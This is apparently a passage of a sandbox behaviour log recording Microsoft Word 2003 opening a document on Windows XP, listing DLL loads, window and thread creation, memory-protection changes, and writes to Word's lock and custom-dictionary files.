C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 32E0000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 32F0000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 32F0000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 32E0000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 32F0000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 32F0000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\fontsub.dll write and read and execute commit 32E0000 81920 own pid execute success or wait 1
C:\WINDOWS\system32\fontsub.dll query and write and read and execute image 69310000 94208 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 32E0000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 32F0000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 32F0000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 32E0000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 32F0000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 32F0000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 32E0000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 32F0000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 32F0000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\Program Files\Common Files\System\ado\msadox.dll write and read and execute commit 2CB0000 200704 own pid execute success or wait 1
C:\Program Files\Common Files\System\ado\msadox.dll query and read commit 2CB0000 200704 own pid readonly success or wait 1
C:\Program Files\Common Files\System\ado\msadox.dll write and read and execute commit 2CB0000 200704 own pid execute success or wait 1
C:\Program Files\Common Files\System\ado\msadox.dll query and read commit 2CB0000 200704 own pid readonly success or wait 1
C:\Program Files\Messenger\msmsgs.exe write and read and execute commit 2EE0000 1695744 own pid execute success or wait 1
C:\Program Files\Messenger\msmsgs.exe query and read commit 2EE0000 1695744 own pid readonly success or wait 1
C:\Program Files\Messenger\msmsgs.exe write and read and execute commit 2EE0000 1695744 own pid execute success or wait 1
C:\Program Files\Messenger\msmsgs.exe query and read commit 2EE0000 1695744 own pid readonly success or wait 1
File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
C:\Program Files\Common Files\Microsoft Shared\OFFICE11\MSO.DLL write and read and execute commit 860000 12259328 own pid execute success or wait 1 30003071
C:\Program Files\Common Files\Microsoft Shared\OFFICE11\MSO.DLL query and write and read and execute image 30C90000 12304384 own pid read write success or wait 1 30003071
\BaseNamedObjects\ShimSharedMemory write unknown 870000 57344 own pid read write success or wait 1 30003071
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll write and read and execute commit A40000 1056768 own pid execute success or wait 1 30029E78
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll query and write and read and execute image 773D0000 1060864 own pid read write success or wait 1 30029E78
\KnownDlls\SHLWAPI.dll write and read and execute unknown 77F60000 483328 own pid read write success or wait 1 30029E78
C:\WINDOWS\WindowsShell.Manifest write and read and execute commit A40000 4096 own pid execute success or wait 1 30029E78
C:\WINDOWS\WindowsShell.Manifest query and read commit A40000 4096 own pid readonly success or wait 1 30029E78
C:\WINDOWS\WindowsShell.Manifest read commit A40000 4096 own pid readonly success or wait 1 30029E78
\BaseNamedObjects\PrimaryWord11SharedMemoryArea read unknown unknown unknown unknown unknown object name not found 1 3002AA90
\BaseNamedObjects\PrimaryWord11SharedMemoryArea query and write and read commit AA0000 4096 own pid read write success or wait 1 3002AAA7
\KnownDlls\MSIMG32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1 30003601
C:\WINDOWS\system32\msimg32.dll query and write and read and execute image 76380000 20480 own pid read write success or wait 1 30003601
C:\Program Files\Common Files\Microsoft Shared\PROOF\1033\MSGR3EN.DLL write and read and execute commit 26D0000 3166208 own pid execute success or wait 1 301C8944
C:\Program Files\Common Files\Microsoft Shared\PROOF\1033\MSGR3EN.DLL query and write and read and execute image 3F100000 3166208 own pid read write success or wait 1 301C8944

Registry Activities

Key Path Completion Count Source Address Symbol
Key Path Completion Count Source Address Symbol
Key Path Key Value Name Completion Count Source Address Symbol
Key Path Name Type Data Completion Count Source Address Symbol
Key Path Name Type Old Data New Data Completion Count Source Address Symbol
Key Path Name Completion Count Source Address Symbol
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion CommonFilesDir success or wait 1 3000303D RegQueryValueExW

Mutex Activities

Name Completion Count Source Address Symbol

Process Activities

PID Process info class Completion Count Source Address Symbol
900 QuotaLimits success or wait 10 30007F87 GlobalMemoryStatusEx
900 VmCounters success or wait 10 30007F87 GlobalMemoryStatusEx

Thread Activities

TID PID EIP EAX (Usermode EIP) Filepath Completion Count Source Address Symbol
1328 900 7C8106F9 30072A95 C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE success or wait 1 30072974 CreateThread
1780 900 7C8106F9 30072A95 C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE success or wait 1 30072974 CreateThread
TID PID Path Completion Count Source Address Symbol
1328 900 C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE success or wait 1 30072996 ResumeThread
1780 900 C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE success or wait 1 30072996 ResumeThread
TID Delay Completion Count Source Address Symbol
TID PID Completion Count Source Address Symbol

Memory Activities

PID Filepath Base Length Value Completion Count Source Address Symbol
PID Filepath Base Length Protection Completion Count Source Address Symbol
PID Filepath Base Length New Protection Old Protection Completion Count Source Address Symbol
900 C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE 30B81000 1000 page readonly page read and write success or wait 1 30001C81 VirtualProtect
Time Private Usage (mb) Workingset (mb) Page File Usage (mb)
15:20:42 0 0 0
15:20:43 2 7 2
15:20:44 3 10 3
15:20:45 3 11 3
15:20:46 4 12 4
15:20:47 7 17 7
15:20:48 7 17 7
15:20:49 7 17 7
15:20:54 7 17 7
15:21:44 7 17 7

System Activities

System info class Completion Count Source Address Symbol

Timing Activities

Time Completion Count Source Address Symbol

Windows UI Activities

Window name Class name HWND Completion Count Source Address Symbol
OpusApp OpusApp 6014A success 1 30029D25 CreateWindowExW
_WwC _WwC 50132 success 1 30054A32 CreateWindowExA
_WwF _WwF 900F4 success 1 30054A32 CreateWindowExA
_WwB _WwB 600F8 success 1 30029D25 CreateWindowExW
_WwB _WwB 500F0 success 1 30029D25 CreateWindowExW
_WwG _WwG 500EE success 1 30029D25 CreateWindowExW
6.0.2600.6028!ScrollBar SCROLLBAR 500EA success 1 30054A32 CreateWindowExA
_WwC _WwC 500E8 success 1 30054A32 CreateWindowExA
6.0.2600.6028!ScrollBar SCROLLBAR 500E0 success 1 30054A32 CreateWindowExA
_WwC _WwC A0058 success 1 30054A32 CreateWindowExA
_WwC _WwC 6012C success 1 30054A32 CreateWindowExA
_WwC _WwC 500D6 success 1 30054A32 CreateWindowExA
Window name Class name HWND of window Completion Count Source Address Symbol
NULL MSOBALLOON 0 error 1 30063D12 FindWindowA
NULL MsoHelp10 0 error 1 30063D27 FindWindowA
NULL AgentAnim 0 error 1 30063D40 FindWindowA
HWND Completion Count Source Address Symbol
600F8 success 1 3067CF46 NtUserDestroyWindow
Desktop HWND Parent HWND Enum Childrens TID Window Handles Completion Count Source Address Symbol
0 0 false 5D4 6014A, 6012E, 500F2, 8013C, 1, 1, 10078, 10084, 10088, 1, 88000000, 88000000, 88000000, 88000000, 88000000 success or wait 1 3067D66A KiUserApcDispatcher
HWND Completion Count Source Address Symbol
1008C success 1 300037BB NtUserGetForegroundWindow
6014A success 24 30063CEF NtUserGetForegroundWindow
HWND Command Completion Count Source Address Symbol
50132 show normal error 1 3005545D NtUserShowWindow
6014A show maximized error 1 3002CCA5 NtUserShowWindow
50132 show normal success 4 3005545D NtUserShowWindow
500EA show normal error 1 300747CC NtUserShowWindow
500E0 show normal error 1 300747CC NtUserShowWindow
500D8 show normal error 1 300747CC NtUserShowWindow
500E6 show normal error 1 300747CC NtUserShowWindow
6012C show normal error 1 300747CC NtUserShowWindow
500D6 show normal error 1 300747CC NtUserShowWindow
500EA show normal success 3 300747CC NtUserShowWindow
500E0 show normal success 3 300747CC NtUserShowWindow
500D8 show normal success 3 300747CC NtUserShowWindow
500E6 show normal success 3 300747CC NtUserShowWindow
6012C show normal success 3 300747CC NtUserShowWindow
500D6 show normal success 3 300747CC NtUserShowWindow
500F0 show normal error 1 3006A9F5 NtUserShowWindow
500EE show normal error 1 30074BAC NtUserShowWindow
6012C show success 1 30074BC1 NtUserShowWindow
500D6 show success 1 30074BD6 NtUserShowWindow
HWND Command Completion Count Source Address Symbol
6014A show maximized success 1 3006ADB8 NtUserGetWindowPlacement
HWND Message LParam WParam Completion Count Source Address Symbol
6014A 45F 0 0 success 1 30003B2E PostMessageA
A013E DDE_ACK 393464 1878224 success 1 3067D00E PostMessageA
A013E DDE_TERMINATE 393464 0 success 1 3067D00E PostMessageA
TID Message LParam WParam Completion Count Source Address Symbol
Module Thread id Hook code Completion Count Source Address Symbol
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE 1492 FFFFFFFF success 1 30007EF6 SetWindowsHookExW

Process Token Activities

Status Privilege Completion Count Source Address Symbol

Chronological Activities

Operation Data Completion Time
Memory attributes changed PID: 900 Path: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE Base: 30B81000 Length: 1000 New Protection: page readonly New Protection: page read and write success or wait 750261376
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion Name: CommonFilesDir success or wait 750262109
Section loaded Path: C:\Program Files\Common Files\Microsoft Shared\OFFICE11\MSO.DLL Access: write and read and execute Type: commit Baseaddress: 860000 Size: 12259328 Protection: execute Mapped to pid: own pid success or wait 750263674
Section loaded Path: C:\Program Files\Common Files\Microsoft Shared\OFFICE11\MSO.DLL Access: query and write and read and execute Type: image Baseaddress: 30C90000 Size: 12304384 Protection: read write Mapped to pid: own pid success or wait 750269836
Section loaded Path: \BaseNamedObjects\ShimSharedMemory Access: write Type: unknown Baseaddress: 870000 Size: 57344 Protection: read write Mapped to pid: own pid success or wait 750325362
Foreground Window Got HWND: 1008C success 750394899
Process information queried PID: 900 Info Class: QuotaLimits success or wait 750505192
Process information queried PID: 900 Info Class: VmCounters success or wait 750505387
Process information queried PID: 900 Info Class: QuotaLimits success or wait 750614181
Process information queried PID: 900 Info Class: VmCounters success or wait 750614384
Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: write and read and execute Type: commit Baseaddress: A40000 Size: 1056768 Protection: execute Mapped to pid: own pid success or wait 750725305
Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: query and write and read and execute Type: image Baseaddress: 773D0000 Size: 1060864 Protection: read write Mapped to pid: own pid success or wait 750729608
Section loaded Path: \KnownDlls\SHLWAPI.dll Access: write and read and execute Type: unknown Baseaddress: 77F60000 Size: 483328 Protection: read write Mapped to pid: own pid success or wait 750739389
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: A40000 Size: 4096 Protection: execute Mapped to pid: own pid success or wait 750759449
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: A40000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 750762321
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: read Type: commit Baseaddress: A40000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 750768490
Window created Window Name: OpusApp Class Name: OpusApp HWND: 6014A success 750812220
Section loaded Path: \BaseNamedObjects\PrimaryWord11SharedMemoryArea Access: read Type: unknown Baseaddress: unknown Size: unknown Protection: unknown Mapped to pid: unknown object name not found 750942875
Section loaded Path: \BaseNamedObjects\PrimaryWord11SharedMemoryArea Access: query and write and read Type: commit Baseaddress: AA0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 750943999
Process information queried PID: 900 Info Class: QuotaLimits success or wait 750980572
Process information queried PID: 900 Info Class: VmCounters success or wait 750980761
Windows hook set Module: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE TID: 1492 Hook ID: FFFFFFFF success 751090439
Process information queried PID: 900 Info Class: QuotaLimits success or wait 751392036
Process information queried PID: 900 Info Class: VmCounters success or wait 751395394
Process information queried PID: 900 Info Class: QuotaLimits success or wait 751413140
Process information queried PID: 900 Info Class: VmCounters success or wait 751413352
Window created Window Name: _WwC Class Name: _WwC HWND: 50132 success 751458139
Window shown HWND: 50132 CMD: show normal error 751458688
Window created Window Name: _WwF Class Name: _WwF HWND: 900F4 success 751749706
Window shown HWND: 6014A CMD: show maximized error 751780007
Foreground Window Got HWND: 6014A success 751794202
Windows found Window Name: NULL Class Name: MSOBALLOON HWND: 0 error 751794439
Windows found Window Name: NULL Class Name: MsoHelp10 HWND: 0 error 751794651
Windows found Window Name: NULL Class Name: AgentAnim HWND: 0 error 751794859
Foreground Window Got HWND: 6014A success 751833793
Foreground Window Got HWND: 6014A success 751848918
Foreground Window Got HWND: 6014A success 751866017
Window shown HWND: 50132 CMD: show normal success 751940171
Window shown HWND: 50132 CMD: show normal success 752120675
Message posted HWND: 6014A Message: 45F WParam: 0 LParam: 0 success 752147007
Foreground Window Got HWND: 6014A success 752151848
Window created Window Name: _WwB Class Name: _WwB HWND: 600F8 success 753084232
Foreground Window Got HWND: 6014A success 753229825
Foreground Window Got HWND: 6014A success 753230775
Process information queried PID: 900 Info Class: QuotaLimits success or wait 753647617
Process information queried PID: 900 Info Class: VmCounters success or wait 753647828
Process information queried PID: 900 Info Class: QuotaLimits success or wait 753666921
Process information queried PID: 900 Info Class: VmCounters success or wait 753667135
File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\~$hone 5.doc Offset: unknown Length: 54 Value: 0D 48 61 6E 75 65 6C 65 20 42 61 73 65 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 success or wait 753680920
File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\~$hone 5.doc Offset: unknown Length: 108 Value: 0D 00 48 00 61 00 6E 00 75 00 65 00 6C 00 65 00 20 00 42 00 61 00 73 00 65 00 72 00 00 00 00 00 16 00 00 00 F8 00 06 00 3E 01 0A 00 A0 00 00 00 00 00 00 00 00 00 00 00 00 00 FF FF 02 00 00 00 00 00 00 00 74 47 0C 00 FF FF FF FF FF FF 0C 00 5C 00 00 00 03 00 00 00 04 00 00 00 08 00 00 00 04 00 00 00 success or wait 753682093
Window placement got HWND: 6014A CMD: show maximized success 753768396
Window created Window Name: _WwB Class Name: _WwB HWND: 500F0 success 753772507
Foreground Window Got HWND: 6014A success 753851850
Window created Window Name: _WwG Class Name: _WwG HWND: 500EE success 753854469
Window created Window Name: 6.0.2600.6028!ScrollBar Class Name: SCROLLBAR HWND: 500EA success 753857889
Window created Window Name: _WwC Class Name: _WwC HWND: 500E8 success 753858691
Window created Window Name: 6.0.2600.6028!ScrollBar Class Name: SCROLLBAR HWND: 500E0 success 753885721
Window created Window Name: _WwC Class Name: _WwC HWND: A0058 success 753915617
Window created Window Name: _WwC Class Name: _WwC HWND: 6012C success 753916155
Window created Window Name: _WwC Class Name: _WwC HWND: 500D6 success 753917152
Window shown HWND: 500EA CMD: show normal error 754524191
Window shown HWND: 500E0 CMD: show normal error 754524370
Window shown HWND: 500D8 CMD: show normal error 754524534
Window shown HWND: 500E6 CMD: show normal error 754525286
Window shown HWND: 6012C CMD: show normal error 754525944
Window shown HWND: 500D6 CMD: show normal error 754526887
Window shown HWND: 500EA CMD: show normal success 754538069
Window shown HWND: 500E0 CMD: show normal success 754538228
Window shown HWND: 500D8 CMD: show normal success 754538386
Window shown HWND: 500E6 CMD: show normal success 754539189
Window shown HWND: 6012C CMD: show normal success 754539699
Window shown HWND: 500D6 CMD: show normal success 754548016
Window shown HWND: 500EA CMD: show normal success 754549802
Window shown HWND: 500E0 CMD: show normal success 754549961
Window shown HWND: 500D8 CMD: show normal success 754550118
Window shown HWND: 500E6 CMD: show normal success 754550531
Window shown HWND: 6012C CMD: show normal success 754550879
Window shown HWND: 500D6 CMD: show normal success 754551036
Window shown HWND: 50132 CMD: show normal success 754551212
Window shown HWND: 500F0 CMD: show normal error 754551372
Window shown HWND: 500EE CMD: show normal error 755036978
Window shown HWND: 6012C CMD: show success 755037750
Window shown HWND: 500D6 CMD: show success 755037910
Window shown HWND: 50132 CMD: show normal success 755038675
Window shown HWND: 500EA CMD: show normal success 755038839
Window shown HWND: 500E0 CMD: show normal success 755049037
Window shown HWND: 500D8 CMD: show normal success 755050257
Window shown HWND: 500E6 CMD: show normal success 755051222
Window shown HWND: 6012C CMD: show normal success 755051729
Window shown HWND: 500D6 CMD: show normal success 755051889
Message posted HWND: A013E Message: DDE_ACK WParam: 393464 LParam: 1878224 success 755255730
Foreground Window Got HWND: 6014A success 755304980
Section loaded Path: \KnownDlls\MSIMG32.dll Access: write and read and execute Type: unknown Baseaddress: unknown Size: unknown Protection: unknown Mapped to pid: unknown object name not found 755316242
Section loaded Path: C:\WINDOWS\system32\msimg32.dll Access: query and write and read and execute Type: image Baseaddress: 76380000 Size: 20480 Protection: read write Mapped to pid: own pid success or wait 755317843
Message posted HWND: A013E Message: DDE_TERMINATE WParam: 393464 LParam: 0 success 755347431
Window destroyed HWND: 600F8 success 755351973
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 5D4 HWNDs: 6014A, 6012E, 500F2, 8013C, 1, 1, 10078, 10084, 10088, 1, 88000000, 88000000, 88000000, 88000000, 88000000 success or wait 755352123
Process information queried PID: 900 Info Class: QuotaLimits success or wait 758139432
Process information queried PID: 900 Info Class: VmCounters success or wait 758139638
Foreground Window Got HWND: 6014A success 758207605
Foreground Window Got HWND: 6014A success 758207760
Foreground Window Got HWND: 6014A success 758208016
Foreground Window Got HWND: 6014A success 758208166
Foreground Window Got HWND: 6014A success 758208401
Foreground Window Got HWND: 6014A success 758208549
Foreground Window Got HWND: 6014A success 758208784
Foreground Window Got HWND: 6014A success 758208931
Foreground Window Got HWND: 6014A success 758209166
Foreground Window Got HWND: 6014A success 758209314
Foreground Window Got HWND: 6014A success 758219801
Foreground Window Got HWND: 6014A success 758219951
Foreground Window Got HWND: 6014A success 758220189
Foreground Window Got HWND: 6014A success 758220338
Thread created PID: 900 TID: 1328 EIP: 7C8106F9 EAX: 30072A95 Imagepath: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE success or wait 758868385
Thread resumed TID: 1328 PID: 900 Path: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE success or wait 758869169
File other op Path: C:\Documents and Settings\Administrator\Application Data\Microsoft\Proof\CUSTOM.DIC New path: Disposition: PositionInformation Data : Offset: 0 success or wait 763625296
File write Path: C:\Documents and Settings\Administrator\Application Data\Microsoft\Proof\~$CUSTOM.DIC Offset: unknown Length: 54 Value: 0D 48 61 6E 75 65 6C 65 20 42 61 73 65 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 success or wait 763630404
File write Path: C:\Documents and Settings\Administrator\Application Data\Microsoft\Proof\~$CUSTOM.DIC Offset: unknown Length: 108 Value: 0D 00 48 00 61 00 6E 00 75 00 65 00 6C 00 65 00 20 00 42 00 61 00 73 00 65 00 72 00 00 00 00 00 20 00 00 00 00 00 00 00 04 00 00 00 04 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 00 00 00 00 00 03 00 01 00 0C 00 5C 00 00 00 03 00 00 00 04 00 00 00 08 00 00 00 04 00 00 00 success or wait 763631655
File other op Path: C:\Documents and Settings\Administrator\Application Data\Microsoft\Proof\CUSTOM.DIC New path: Disposition: PositionInformation Data : Offset: 0 success or wait 763638966
File deleted Path: C:\Documents and Settings\Administrator\Application Data\Microsoft\Proof\~$CUSTOM.DIC New path: Disposition: Data : success or wait 763643082
File deleted Path: C:\Documents and Settings\Administrator\Application Data\Microsoft\Proof\CUSTOM.DIC New path: Disposition: Data : success or wait 763648536
File moved Path: C:\Documents and Settings\Administrator\Application Data\Microsoft\Proof\~WRI0002 New path: C:\Documents and Settings\Administrator\Application Data\Microsoft\Proof\CUSTOM.DIC Disposition: Data : success or wait 763651573
File other op Path: C:\Documents and Settings\Administrator\Application Data\Microsoft\Proof\CUSTOM.DIC New path: Disposition: PositionInformation Data : Offset: 0 success or wait 763677595
File write Path: C:\Documents and Settings\Administrator\Application Data\Microsoft\Proof\~$CUSTOM.DIC Offset: unknown Length: 54 Value: 0D 48 61 6E 75 65 6C 65 20 42 61 73 65 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 success or wait 763681754
File write Path: C:\Documents and Settings\Administrator\Application Data\Microsoft\Proof\~$CUSTOM.DIC Offset: unknown Length: 108 Value: 0D 00 48 00 61 00 6E 00 75 00 65 00 6C 00 65 00 20 00 42 00 61 00 73 00 65 00 72 00 00 00 00 00 20 00 00 00 00 00 00 00 04 00 00 00 04 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 00 00 00 00 00 03 00 01 00 0C 00 5C 00 00 00 03 00 00 00 04 00 00 00 08 00 00 00 04 00 00 00 success or wait 763682872
File other op Path: C:\Documents and Settings\Administrator\Application Data\Microsoft\Proof\CUSTOM.DIC New path: Disposition: PositionInformation Data : Offset: 0 success or wait 763684313
File deleted Path: C:\Documents and Settings\Administrator\Application Data\Microsoft\Proof\~$CUSTOM.DIC New path: Disposition: Data : success or wait 763689022
Section loaded Path: C:\Program Files\Common Files\Microsoft Shared\PROOF\1033\MSGR3EN.DLL Access: write and read and execute Type: commit Baseaddress: 26D0000 Size: 3166208 Protection: execute Mapped to pid: own pid success or wait 764865279
Section loaded Path: C:\Program Files\Common Files\Microsoft Shared\PROOF\1033\MSGR3EN.DLL Access: query and write and read and execute Type: image Baseaddress: 3F100000 Size: 3166208 Protection: read write Mapped to pid: own pid success or wait 764869274
Process information queried PID: 900 Info Class: QuotaLimits success or wait 764991698
Process information queried PID: 900 Info Class: VmCounters success or wait 764991901
Thread created PID: 900 TID: 1780 EIP: 7C8106F9 EAX: 30072A95 Imagepath: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE success or wait 770722244
Thread resumed TID: 1780 PID: 900 Path: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE success or wait 770723118
Process information queried PID: 900 Info Class: QuotaLimits success or wait 791430759
Process information queried PID: 900 Info Class: VmCounters success or wait 791430952
Foreground Window Got HWND: 6014A success 965806601